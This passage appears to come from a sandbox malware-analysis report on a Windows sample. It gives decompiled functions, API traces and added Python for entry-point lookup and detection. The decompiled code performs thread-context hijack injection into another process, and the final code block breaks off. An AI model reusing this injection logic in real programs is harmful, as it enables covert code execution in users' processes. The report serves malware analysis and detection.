                                          • Associated: 00000004.00000002.752091234.0000000000B16000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.752173878.0000000000B17000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: memcpy$ChangeCloseErrorFindFreeHandleLocalModuleNotificationSectionStatusUnmapViewmemset
                                          • String ID:
                                          • API String ID: 3425476150-0
                                          • Opcode ID: 4c18b4b0cdad86f946ba8aec6a68f853220071252a973cf76b106142afdff7de
                                          • Instruction ID: 6842ab8ccdcce3345ebbb4feed9dc32ddc918829788c5eaef5d09fab785f55fb
                                          • Opcode Fuzzy Hash: 4c18b4b0cdad86f946ba8aec6a68f853220071252a973cf76b106142afdff7de
                                          • Instruction Fuzzy Hash: CC515D76E41509AFCB11DFA8DD51BDDBBB8EF08314F544169E804E7352E735AE608B80
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 63%
                                          			E00AB220D(signed int __edx) {
                                          				intOrPtr _v8;
                                          				intOrPtr _v16;
                                          				char _v20;
                                          				char _v24;
                                          				char _v28;
                                          				intOrPtr _v32;
                                          				void* _v36;
                                          				intOrPtr* _v40;
                                          				char _v44;
                                          				intOrPtr _v1024;
                                          				intOrPtr _v1028;
                                          				intOrPtr _v1228;
                                          				void _v1276;
                                          				void* __ebx;
                                          				void* __ecx;
                                          				intOrPtr* _t38;
                                          				void* _t40;
                                          				void* _t44;
                                          				void* _t46;
                                          				intOrPtr* _t51;
                                          				signed int _t53;
                                          				signed int _t58;
                                          				void* _t59;
                                          				void* _t61;
                                          				signed int _t62;
                                          				signed int _t63;
                                          				signed int _t64;
                                          				void* _t66;
                                          				intOrPtr* _t68;
                                          				signed int _t74;
                                          				void* _t78;
                                          				void* _t81;
                                          				void* _t82;
                                          
                                          				_t62 = __edx;
                                          				_t58 = _t74;
                                          				_push(_t59);
                                          				_push(_t59);
                                          				_v8 =  *((intOrPtr*)(_t58 + 4));
                                          				_push(_t63);
                                          				_v28 = 0xccccfeeb;
                                          				_t64 = _t63 | 0xffffffff;
                                          				memset( &_v1276, 0, 0x4d0);
                                          				_t38 = E00AB3255(_t62);
                                          				_t68 =  *((intOrPtr*)(_t58 + 8));
                                          				_v40 = _t38;
                                          				_v1228 = 0x100003;
                                          				_t40 = E00AB1F93(_t62,  *_t68,  &_v20); // executed
                                          				_t78 = (_t74 & 0xfffffff0) + 4 - 0x4f8 + 0x14;
                                          				if(_t40 >= 0) {
                                          					_t44 = E00AB3236(_t59,  *_t68, _v20, _v16,  &_v44, 4,  &_v24); // executed
                                          					_t81 = _t78 + 0x18;
                                          					if(_t44 != 0) {
                                          						_t86 = _v24 - 4;
                                          						if(_v24 == 4) {
                                          							_t46 = E00AB20D2(_t59, _t62, _t86,  *_t68, _v20, _v16,  &_v28, 4); // executed
                                          							_t82 = _t81 + 0x14;
                                          							if(_t46 != 0) {
                                          								_t66 = 0x1770;
                                          								asm("cdq");
                                          								_v36 =  &_v1276;
                                          								_v32 = _t62;
                                          								do {
                                          									ResumeThread( *(_t68 + 4)); // executed
                                          									Sleep(0x12c); // executed
                                          									SuspendThread( *(_t68 + 4)); // executed
                                          									_push(_v32);
                                          									_t66 = _t66 - 0x12c;
                                          									_push(_v36);
                                          									asm("cdq");
                                          									_push(_t62);
                                          									_push( *(_t68 + 4));
                                          									_t51 = _v40;
                                          									_push(0);
                                          									_push(2);
                                          									_push( *((intOrPtr*)(_t51 + 4)));
                                          									_push( *_t51);
                                          									E00AB3760();
                                          									_t82 = _t82 + 0x20;
                                          								} while (_t66 > 0 && (_v1028 != _v20 || _v1024 != _v16));
                                          								_t91 =  *((intOrPtr*)(_t58 + 0x10));
                                          								if( *((intOrPtr*)(_t58 + 0x10)) == 0) {
                                          									_t53 = E00AB3309(_t59, _t62, _t68,  *((intOrPtr*)(_t58 + 0xc)));
                                          								} else {
                                          									_t53 = E00AB1B12(_t58, _t62, _t68, 0); // executed
                                          								}
                                          								_pop(_t61);
                                          								_t64 = _t53;
                                          								E00AB20D2(_t61, _t62, _t91,  *_t68, _v20, _v16,  &_v44, 4); // executed
                                          							}
                                          						}
                                          					}
                                          				}
                                          				return _t64;
                                          			}

                                          APIs
                                          • memset.NTDLL ref: 00AB2242
                                            • Part of subcall function 00AB3255: GetCurrentProcessId.KERNEL32(00000008,?,00000000,00AB33B9,?,00000000,000004D0,00000008,00000000), ref: 00AB3267
                                            • Part of subcall function 00AB3255: OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00AB33B9,?,00000000,000004D0,00000008,00000000), ref: 00AB3274
                                            • Part of subcall function 00AB3255: FindCloseChangeNotification.KERNELBASE(00000000,000004D0,00000008,00000000), ref: 00AB32C3
                                            • Part of subcall function 00AB20D2: GetCurrentProcessId.KERNEL32(00000000,?), ref: 00AB20F2
                                            • Part of subcall function 00AB20D2: OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00AB20FF
                                          • ResumeThread.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00AB22D1
                                          • Sleep.KERNELBASE(0000012C,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00AB22DC
                                          • SuspendThread.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00AB22E5
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.749055868.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true
                                          • Associated: 00000004.00000002.749044782.0000000000AB0000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.749069471.0000000000AB5000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp
                                          • Associated: 00000004.00000002.752091234.0000000000B16000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.752173878.0000000000B17000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Process$CurrentOpenThread$ChangeCloseFindNotificationResumeSleepSuspendmemset
                                          • String ID:
                                          • API String ID: 3650241253-0
                                          • Opcode ID: eb51bea2842415bbc1f80a840567b6e84ce24936ab750189591bb4baff2a6f31
                                          • Instruction ID: c00cb70ca71e01dfb3a9cad0976561bfa891900d48a6f9f2dfc7a8f9d9c6eebb
                                          • Opcode Fuzzy Hash: eb51bea2842415bbc1f80a840567b6e84ce24936ab750189591bb4baff2a6f31
                                          • Instruction Fuzzy Hash: 7B4162B6D00105EFDF11AF94CD02FEEBBB9FB04310F140165FA14A61A2E7359A51DB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 84%
                                          			E00AB2A4E(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
                                          				void* _t32;
                                          				intOrPtr* _t40;
                                          				intOrPtr _t44;
                                          				void* _t46;
                                          				long _t52;
                                          				void* _t54;
                                          				void* _t55;
                                          				intOrPtr _t56;
                                          				void* _t57;
                                          				void* _t58;
                                          				void* _t59;
                                          				void* _t60;
                                          
                                          				_t60 = __eflags;
                                          				_push(0x28);
                                          				_push(0xab5468);
                                          				E00AB1000(__ebx, __edi, __esi);
                                          				asm("xorps xmm0, xmm0");
                                          				asm("movlpd [ebp-0x38], xmm0");
                                          				_t54 = 0;
                                          				_t32 = E00AB2C02(__ecx, _t60,  *((intOrPtr*)(_t57 + 8)),  *((intOrPtr*)(_t57 + 0xc)), _t57 - 0x30, _t57 - 0x20); // executed
                                          				_t59 = _t58 + 0x10;
                                          				if(_t32 != 0) {
                                          					L7:
                                          					if(_t54 != 0) {
                                          						VirtualFree(_t54, 0, 0x8000); // executed
                                          					}
                                          					L9:
                                          					return E00AB103B( *((intOrPtr*)(_t57 - 0x38)));
                                          				}
                                          				_t52 =  *(_t57 - 0x20);
                                          				_t36 = VirtualAlloc(_t32, _t52, 0x3000, 4); // executed
                                          				_t55 = _t36;
                                          				 *(_t57 - 0x20) = _t55;
                                          				if(_t55 == 0) {
                                          					goto L9;
                                          				}
                                          				 *(_t57 - 0x1c) = _t36;
                                          				_t44 =  *((intOrPtr*)(_t57 - 0x30));
                                          				 *((intOrPtr*)(_t57 - 0x28)) = _t44;
                                          				_t56 =  *((intOrPtr*)(_t57 - 0x2c));
                                          				 *((intOrPtr*)(_t57 - 0x24)) = _t56;
                                          				_t46 = 0x1000;
                                          				do {
                                          					E00AB31D4(_t46,  *((intOrPtr*)(_t57 + 8)), _t57 - 0x28, _t36, _t46); // executed
                                          					_t59 = _t59 + 0x10;
                                          					_t46 = 0x1000;
                                          					_t36 =  *(_t57 - 0x1c) + 0x1000;
                                          					 *(_t57 - 0x1c) =  *(_t57 - 0x1c) + 0x1000;
                                          					_t44 = _t44 + 0x1000;
                                          					 *((intOrPtr*)(_t57 - 0x28)) = _t44;
                                          					asm("adc esi, 0x0");
                                          					 *((intOrPtr*)(_t57 - 0x24)) = _t56;
                                          					_t52 = _t52 - 0x1000;
                                          					_t63 = _t52;
                                          				} while (_t52 != 0);
                                          				 *(_t57 - 4) =  *(_t57 - 4) & _t52;
                                          				_t54 =  *(_t57 - 0x20);
                                          				_t40 = E00AB414A(_t44, _t63, _t54,  *((intOrPtr*)(_t57 + 0x10)));
                                          				if(_t40 != 0) {
                                          					asm("adc ecx, [ebp-0x2c]");
                                          					 *((intOrPtr*)(_t57 - 0x38)) =  *_t40 +  *((intOrPtr*)(_t57 - 0x30));
                                          					 *((intOrPtr*)(_t57 - 0x34)) = 0;
                                          				}
                                          				 *(_t57 - 4) =  *(_t57 - 4) | 0xffffffff;
                                          				goto L7;
                                          			}

                                          APIs
                                            • Part of subcall function 00AB2C02: VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,00000000,000004D0,00000008,00000000), ref: 00AB2C30
                                            • Part of subcall function 00AB2C02: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00AB2C6B
                                            • Part of subcall function 00AB2C02: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00AB2C7B
                                            • Part of subcall function 00AB2C02: lstrcmpiA.KERNEL32(?,00000000), ref: 00AB2CB9
                                            • Part of subcall function 00AB2C02: StrChrA.SHLWAPI(?,0000002E), ref: 00AB2CC8
                                            • Part of subcall function 00AB2C02: lstrcmpiA.KERNEL32(?,00000000), ref: 00AB2CDB
                                            • Part of subcall function 00AB2C02: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00AB2D25
                                          • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,00000000,000004D0,00000008,00000000), ref: 00AB2A8E
                                            • Part of subcall function 00AB31D4: GetModuleHandleW.KERNEL32(NTDLL.DLL,ZwWow64ReadVirtualMemory64,00000000,?,?,?,00AB358B,00000008,?,00000000,00000028,00000100,00000000,00000200), ref: 00AB31F8
                                            • Part of subcall function 00AB31D4: GetProcAddress.KERNEL32(00000000), ref: 00AB31FF
                                            • Part of subcall function 00AB31D4: NtWow64ReadVirtualMemory64.NTDLL(00000028,00000000,?,?,00000008,00000000,00000028,00000000,?,?,?,00AB358B,00000008,?,00000000,00000028), ref: 00AB3227
                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,000004D0,00000008,00000000), ref: 00AB2B27
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.749055868.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000004.00000002.749044782.0000000000AB0000.00000002.00020000.sdmp
• Associated: 00000004.00000002.749069471.0000000000AB5000.00000002.00020000.sdmp
• Associated: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp
• Associated: 00000004.00000002.752091234.0000000000B16000.00000004.00020000.sdmp
• Associated: 00000004.00000002.752173878.0000000000B17000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Virtual$AllocFree$lstrcmpi$AddressHandleMemory64ModuleProcReadWow64
                                          • String ID:
                                          • API String ID: 3389612928-0
                                          • Opcode ID: fa05edb04533295c83f0c4bf91598457abf5fca66ae858b986b80dd74f1c2d04
                                          • Instruction ID: 8fc8c64266fcf6fe4f031a1b0c89be7b443ed3ae7159d4d759da846264b98ca5
                                          • Opcode Fuzzy Hash: fa05edb04533295c83f0c4bf91598457abf5fca66ae858b986b80dd74f1c2d04
                                          • Instruction Fuzzy Hash: 74212872D01218ABDF15DFA4DD41BEEBBB8BF08710F14422AF904B7282DA3499418B90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 65%
                                          			E00AB2961(void* __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
                                          				void* _t21;
                                          				void* _t24;
                                          				intOrPtr _t25;
                                          				void* _t26;
                                          				void* _t27;
                                          
                                          				_t25 = __edx;
                                          				_t24 = __ecx;
                                          				_t26 = 8;
                                          				_t27 = E00AB1490(0x318);
                                          				if(_t27 != 0) {
                                          					memset(_t27, 0, 0x318);
                                          					asm("cdq");
                                          					 *((intOrPtr*)(_t27 + 8)) = _a8;
                                          					 *((intOrPtr*)(_t27 + 0xc)) = _t25;
                                          					asm("cdq");
                                          					 *((intOrPtr*)(_t27 + 0x10)) = _a12;
                                          					 *((intOrPtr*)(_t27 + 0x14)) = _t25;
                                          					if((_a16 & 0x00000010) != 0 || ( *0xb16d44 & 0x00000001) == 0) {
                                          						_push(_a16);
                                          						_t21 = E00AB2ED8(_t25, _a4, _t27);
                                          					} else {
                                          						_push(_a16);
                                          						_push(_t27);
                                          						_push(_a4);
                                          						_t21 = E00AB3383(_t24, _t25); // executed
                                          					}
                                          					_t26 = _t21;
                                          					LocalFree(_t27);
                                          				}
                                          				return _t26;
                                          			}

                                          APIs
                                            • Part of subcall function 00AB1490: LocalAlloc.KERNEL32(00000000,?,00AB29EC,00000104,00000000,00000000,00AB14C8,00000000,?,00AB28A0,00000000,00B16D50,?,?,?,00AB14C8), ref: 00AB1496
                                          • memset.NTDLL ref: 00AB297F
                                          • LocalFree.KERNEL32(00000000), ref: 00AB29CA
                                            • Part of subcall function 00AB3383: memset.NTDLL ref: 00AB33AF
                                            • Part of subcall function 00AB3383: memcpy.NTDLL(?,00AB37D1,00000100,?,00000000,000004D0,00000008,00000000), ref: 00AB33DA
                                            • Part of subcall function 00AB3383: VirtualAllocEx.KERNELBASE(?,00000000,00000318,00003000,00000040,?,?,?,?,00000008,00000000), ref: 00AB33F4
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.749055868.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000004.00000002.749044782.0000000000AB0000.00000002.00020000.sdmp
• Associated: 00000004.00000002.749069471.0000000000AB5000.00000002.00020000.sdmp
• Associated: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp
• Associated: 00000004.00000002.752091234.0000000000B16000.00000004.00020000.sdmp
• Associated: 00000004.00000002.752173878.0000000000B17000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: AllocLocalmemset$FreeVirtualmemcpy
                                          • String ID:
                                          • API String ID: 2149420209-0
                                          • Opcode ID: 913694e5e0e983444a46858db300fc0a5c2eb07aa1774c1e703d19ec1afe705c
                                          • Instruction ID: bcb136341b5c4031a31073a74baeeb0fe01908ddd66824fdedfbd7dd3839cb4a
                                          • Opcode Fuzzy Hash: 913694e5e0e983444a46858db300fc0a5c2eb07aa1774c1e703d19ec1afe705c
                                          • Instruction Fuzzy Hash: 97017C715027186BDB219F19DD01BDB7F9CEF853A4F004826FC4896252D661DD5487A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 81%
                                          			E00AB1F93(void* __edx, intOrPtr _a4, void* _a8) {
                                          				intOrPtr _v8;
                                          				char _v12;
                                          				signed int _v16;
                                          				signed int _v20;
                                          				void _v24;
                                          				intOrPtr _v28;
                                          				char _v32;
                                          				intOrPtr _v44;
                                          				char _v56;
                                          				void* _t38;
                                          				intOrPtr _t42;
                                          				void* _t44;
                                          				void* _t48;
                                          				void _t59;
                                          				void* _t63;
                                          				void* _t66;
                                          				signed int _t67;
                                          				intOrPtr _t72;
                                          				void* _t74;
                                          
                                          				asm("xorps xmm0, xmm0");
                                          				asm("movlpd [ebp-0x14], xmm0");
                                          				_t72 = 0xc000009a;
                                          				_t74 = E00AB1490(0x1000);
                                          				if(_t74 == 0) {
                                          					L17:
                                          					_t59 = _v24;
                                          					_v16 = _v20;
                                          					L12:
                                          					_t38 = _a8;
                                          					 *_t38 = _t59;
                                          					 *((intOrPtr*)(_t38 + 4)) = _v16;
                                          					if(_t74 != 0) {
                                          						LocalFree(_t74);
                                          					}
                                          					return _t72;
                                          				}
                                          				_t73 = _a4;
                                          				_t42 = E00AB2B9D(_a4,  &_v32); // executed
                                          				_v8 = _t42;
                                          				_pop(_t63);
                                          				if(_t42 < 0) {
                                          					_t72 = _t42;
                                          					goto L17;
                                          				}
                                          				_t44 = E00AB3236(_t63, _t73, _v32, _v28, _t74, 0x1000,  &_v12); // executed
                                          				if(_t44 == 0) {
                                          					L15:
                                          					_t72 = _v8;
                                          					goto L17;
                                          				}
                                          				asm("cdq");
                                          				asm("adc edx, [ebp-0x18]");
                                          				_t48 = E00AB3236(_t63, _t73,  *((intOrPtr*)(_t74 + 0x3c)) + _v32, __edx, _t74, 0x1000,  &_v12); // executed
                                          				if(_t48 == 0) {
                                          					goto L15;
                                          				}
                                          				_t59 =  *((intOrPtr*)(_t74 + 0x28)) + _v32;
                                          				asm("adc ecx, [ebp-0x18]");
                                          				_v16 = 0;
                                          				_v20 = 0x8664;
				_t66 =  ==  ? 0xd0 : 0xc0; // condition dropped by the decompiler; together with the 0x8664 (IMAGE_FILE_MACHINE_AMD64) constant stored just above, this selects the NT-header offset of the TLS data-directory entry: 0xd0 for PE32+, 0xc0 for PE32
                                          				_t70 =  *((intOrPtr*)(0xc0 + _t74));
                                          				if( *((intOrPtr*)(0xc0 + _t74)) != 0 &&  *((intOrPtr*)(0xc0 + _t74 + 4)) != 0) {
                                          					asm("adc eax, [ebp-0x18]");
                                          					if(E00AB3236(_t66, _t73, _t70 + _v32, 0,  &_v56, 0x18,  &_v12) != 0 && _v44 != 0 && E00AB3236(_t66, _t73, _v44, 0, _t74, 0x1000,  &_v12) != 0) {
                                          						_t67 =  *(_t74 + 4);
                                          						if(( *_t74 | _t67) != 0) {
                                          							_t59 =  *_t74;
                                          							_v16 = _t67;
                                          						}
                                          					}
                                          				}
                                          				_t72 = _v8;
                                          				goto L12;
                                          			}
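E00AB1F93 above resolves, for a PE image read out of another process, the address that runs first once that process is resumed: it reads e_lfanew at offset 0x3c, AddressOfEntryPoint at NT+0x28, then the TLS data-directory entry at NT+0xc0 (PE32) or NT+0xd0 (PE32+), reads the TLS directory (0x18 bytes) and its callback table, and prefers the first TLS callback over the entry point when one exists. The Python below is an added illustration of that lookup written for this page; it is not code from the sample or from the sandbox. It works on an in-memory copy of the mapped image instead of reading a remote process, the test images produced by build_test_image are constructed, and it goes slightly beyond the decompiled fragment by using the 40-byte IMAGE_TLS_DIRECTORY64 layout for PE32+ images.

```python
"""Resolve the first-executed address of a PE image the way E00AB1F93 does.

Added example for this report page; it is not code from the sample or from
the sandbox.  It works on an in-memory copy of the mapped image rather than
reading another process, and the test images below are constructed.
"""
import struct

IMAGE_FILE_MACHINE_I386 = 0x014C
IMAGE_FILE_MACHINE_AMD64 = 0x8664   # the constant E00AB1F93 compares against
# Offsets used by the decompiled routine, relative to the NT headers:
NT_ADDRESS_OF_ENTRY_POINT = 0x28
NT_TLS_DIRECTORY_PE32 = 0xC0        # IMAGE_DIRECTORY_ENTRY_TLS (9) in PE32 headers
NT_TLS_DIRECTORY_PE32PLUS = 0xD0    # same entry in PE32+ headers


def find_entry_and_tls_callback(image: bytes, image_base: int):
    """Return (entry_point_va, first_tls_callback_va) for a mapped image.

    `image` must hold the headers, the TLS directory and the callback table
    at their RVAs (mapped-image layout, as read from a remote process).
    The callback VA is 0 when the image has no TLS directory or no callbacks.
    """
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    machine = struct.unpack_from("<H", image, e_lfanew + 4)[0]
    entry_va = image_base + struct.unpack_from("<I", image, e_lfanew + NT_ADDRESS_OF_ENTRY_POINT)[0]

    is64 = machine == IMAGE_FILE_MACHINE_AMD64
    tls_dir = e_lfanew + (NT_TLS_DIRECTORY_PE32PLUS if is64 else NT_TLS_DIRECTORY_PE32)
    tls_rva, tls_size = struct.unpack_from("<II", image, tls_dir)
    if tls_rva == 0 or tls_size == 0:
        return entry_va, 0

    # IMAGE_TLS_DIRECTORY.AddressOfCallBacks is a VA: the fourth field of the
    # 24-byte (PE32) or 40-byte (PE32+) structure.  The decompiled code reads
    # the 32-bit layout; the 64-bit case here follows the PE specification.
    if is64:
        callbacks_va = struct.unpack_from("<Q", image, tls_rva + 24)[0]
        ptr_fmt = "<Q"
    else:
        callbacks_va = struct.unpack_from("<I", image, tls_rva + 12)[0]
        ptr_fmt = "<I"
    if callbacks_va == 0:
        return entry_va, 0
    first_callback = struct.unpack_from(ptr_fmt, image, callbacks_va - image_base)[0]
    return entry_va, first_callback


def first_executed_address(image: bytes, image_base: int) -> int:
    """What E00AB1F93 hands back: the first TLS callback if there is one,
    otherwise the entry point.  TLS callbacks run before the entry point,
    which is why an injector hijacking the initial thread prefers them."""
    entry_va, callback_va = find_entry_and_tls_callback(image, image_base)
    return callback_va or entry_va


def build_test_image(is64: bool, image_base: int, with_tls: bool = True) -> bytes:
    """Constructed minimal image (headers only, not a real file) for testing."""
    img = bytearray(0x2000)
    img[0:2] = b"MZ"
    struct.pack_into("<I", img, 0x3C, 0x80)                    # e_lfanew
    img[0x80:0x84] = b"PE\0\0"
    struct.pack_into("<H", img, 0x84, IMAGE_FILE_MACHINE_AMD64 if is64 else IMAGE_FILE_MACHINE_I386)
    struct.pack_into("<I", img, 0x80 + NT_ADDRESS_OF_ENTRY_POINT, 0x1000)
    if with_tls:
        tls_rva, table_rva, callback_rva = 0x1200, 0x1300, 0x1400
        if is64:
            struct.pack_into("<II", img, 0x80 + NT_TLS_DIRECTORY_PE32PLUS, tls_rva, 40)
            struct.pack_into("<Q", img, tls_rva + 24, image_base + table_rva)
            struct.pack_into("<QQ", img, table_rva, image_base + callback_rva, 0)
        else:
            struct.pack_into("<II", img, 0x80 + NT_TLS_DIRECTORY_PE32, tls_rva, 24)
            struct.pack_into("<I", img, tls_rva + 12, image_base + table_rva)
            struct.pack_into("<II", img, table_rva, image_base + callback_rva, 0)
    return bytes(img)


if __name__ == "__main__":
    for is64, base in ((False, 0x400000), (True, 0x140000000)):
        img = build_test_image(is64, base)
        print(hex(base), [hex(v) for v in find_entry_and_tls_callback(img, base)],
              "first executed:", hex(first_executed_address(img, base)))
```

When triaging a dump, comparing the resumed thread's instruction pointer against the value this lookup yields for the target image is a quick way to tell whether the thread was started at the legitimate first-executed address or redirected elsewhere.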

                                          APIs
                                            • Part of subcall function 00AB1490: LocalAlloc.KERNEL32(00000000,?,00AB29EC,00000104,00000000,00000000,00AB14C8,00000000,?,00AB28A0,00000000,00B16D50,?,?,?,00AB14C8), ref: 00AB1496
                                          • LocalFree.KERNEL32(00000000,00001000,00000000,?,?,?,?,?,?,?,00AB2267,?,?,?,00000000,000004D0), ref: 00AB20B2
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.749055868.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000004.00000002.749044782.0000000000AB0000.00000002.00020000.sdmp
• Associated: 00000004.00000002.749069471.0000000000AB5000.00000002.00020000.sdmp
• Associated: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp
• Associated: 00000004.00000002.752091234.0000000000B16000.00000004.00020000.sdmp
• Associated: 00000004.00000002.752173878.0000000000B17000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Local$AllocFree
                                          • String ID:
                                          • API String ID: 2012307162-0
                                          • Opcode ID: 4116a0574af6c4c864dd6130e2e4ef617dc9553a17d6596350f5c70521ca211f
                                          • Instruction ID: 9c4a2a60035e901a190219c83c936f99fe671f2ac32b096daabd3b9e605f2a42
                                          • Opcode Fuzzy Hash: 4116a0574af6c4c864dd6130e2e4ef617dc9553a17d6596350f5c70521ca211f
                                          • Instruction Fuzzy Hash: 04414F72900209AFDB10EB99CD81BFFB7BDEF48354F54445AE904A7242E735AE41CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00AB2B11() {
                                          				void* _t11;
                                          				void* _t12;
                                          
                                          				 *(_t12 - 4) =  *(_t12 - 4) | 0xffffffff;
                                          				_t11 =  *(_t12 - 0x20);
                                          				if(_t11 != 0) {
                                          					VirtualFree(_t11, 0, 0x8000); // executed
                                          				}
                                          				return E00AB103B( *((intOrPtr*)(_t12 - 0x38)));
                                          			}

                                          APIs
                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,000004D0,00000008,00000000), ref: 00AB2B27
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.749055868.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000004.00000002.749044782.0000000000AB0000.00000002.00020000.sdmp
• Associated: 00000004.00000002.749069471.0000000000AB5000.00000002.00020000.sdmp
• Associated: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp
• Associated: 00000004.00000002.752091234.0000000000B16000.00000004.00020000.sdmp
• Associated: 00000004.00000002.752173878.0000000000B17000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: FreeVirtual
                                          • String ID:
                                          • API String ID: 1263568516-0
                                          • Opcode ID: ea9ab400598b0138d641d03f5857a29d7d3bdf6722f55acafe0f9d10735ea652
                                          • Instruction ID: c677d51b2d456fa6c876640102e3c251f15997f5d478d17318ea6a3ecddd784a
                                          • Opcode Fuzzy Hash: ea9ab400598b0138d641d03f5857a29d7d3bdf6722f55acafe0f9d10735ea652
                                          • Instruction Fuzzy Hash: 83D06734D02659ABDB21EB94DD06B8EBB35BF04720FA04340E95077291C7246E418A84
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          C-Code - Quality: 93%
                                          			E00AB2ED8(void* __edx, void* _a4, void* _a8) {
                                          				long _v8;
                                          				void _v540;
                                          				intOrPtr _v548;
                                          				void _v720;
                                          				struct _CONTEXT _v724;
                                          				void* _t28;
                                          				void* _t34;
                                          				void* _t48;
                                          				void* _t51;
                                          				void* _t52;
                                          				void** _t53;
                                          				long _t54;
                                          
                                          				_t51 = __edx;
                                          				_t54 = 0;
                                          				memset( &_v720, 0, 0x2c8);
                                          				_t53 = _a4;
                                          				_v724 = 0x10003;
                                          				_t28 = VirtualAllocEx( *_t53, 0, 0x318, 0x3000, 0x40);
                                          				_a4 = _t28;
                                          				if(_t28 == 0) {
                                          					L10:
                                          					_t54 = GetLastError();
                                          					L11:
                                          					return _t54;
                                          				}
                                          				if(NtGetContextThread(_t53[1],  &_v724) >= 0) {
                                          					_t48 = _a8;
                                          					 *_t48 = _v540;
                                          					_t34 = _a4;
                                          					_v548 = _t34;
                                          					_v540 = _t34 + 0x218;
                                          					 *((intOrPtr*)(_t48 + 4)) = 0;
                                          					memcpy(_t48 + 0x218, E00AB37F6, 0x100);
                                          					asm("cdq");
                                          					if( *((intOrPtr*)(_t48 + 0x10)) != _t48 + 0x18) {
                                          						_t52 = _a4;
                                          					} else {
                                          						_t52 = _a4;
                                          						if( *((intOrPtr*)(_t48 + 0x14)) == _t51) {
                                          							 *((intOrPtr*)(_t48 + 0x10)) = _t52 + 0x18;
                                          							asm("adc ecx, esi");
                                          							 *((intOrPtr*)(_t48 + 0x14)) = 0;
                                          						}
                                          					}
                                          					if(WriteProcessMemory( *_t53, _t52, _t48, 0x318,  &_v8) == 0) {
                                          						goto L10;
                                          					} else {
                                          						if(NtSetContextThread(_t53[1],  &_v724) < 0) {
                                          							goto L2;
                                          						}
                                          						ResumeThread(_t53[1]);
                                          						Sleep(0x1f4);
                                          						SuspendThread(_t53[1]);
                                          						goto L11;
                                          					}
                                          				}
                                          				L2:
                                          				_t54 = 5;
                                          				goto L11;
                                          			}
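E00AB2ED8 above is a thread-context hijack. It allocates a 0x318-byte PAGE_EXECUTE_READWRITE (0x40) block in the target with VirtualAllocEx, captures the suspended thread's CONTEXT (ContextFlags 0x10003, CONTEXT_FULL on x86) with NtGetContextThread, saves the original Eip in the first dword of the block, copies a 0x100-byte stub from 00AB37F6 to block+0x218 and points the context's Eip (CONTEXT offset 0xb8) at it, writes the block with WriteProcessMemory, installs the context with NtSetContextThread, and lets the thread run for 500 ms (Sleep(0x1f4)) before SuspendThread. The ordered API sequence is the detection point. The Python below is an added example for this page, not part of the report or of the sample: it parses the report's own API lines for this function (copied verbatim into TRACE) plus a constructed benign trace for contrast, and flags the ordered pattern of an RWX allocation in another process, a write into it, a thread-context change and a resume. The "Part of subcall function" prefix the report uses on nested calls is tolerated by the parser.

```python
"""Flag the thread-context hijack pattern of E00AB2ED8 in an API trace.

Added example for this report page, not part of the report or the sample.
TRACE is copied from the report's API listing for E00AB2ED8; BENIGN_TRACE is
constructed for contrast.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

TRACE = """\
• memset.NTDLL ref: 00AB2EF2
• VirtualAllocEx.KERNEL32(?,00000000,00000318,00003000,00000040,?,00000008,00000000), ref: 00AB2F16
• NtGetContextThread.NTDLL ref: 00AB2F31
• memcpy.NTDLL(?,00AB37F6,00000100,00000000,?,00000008,00000000), ref: 00AB2F77
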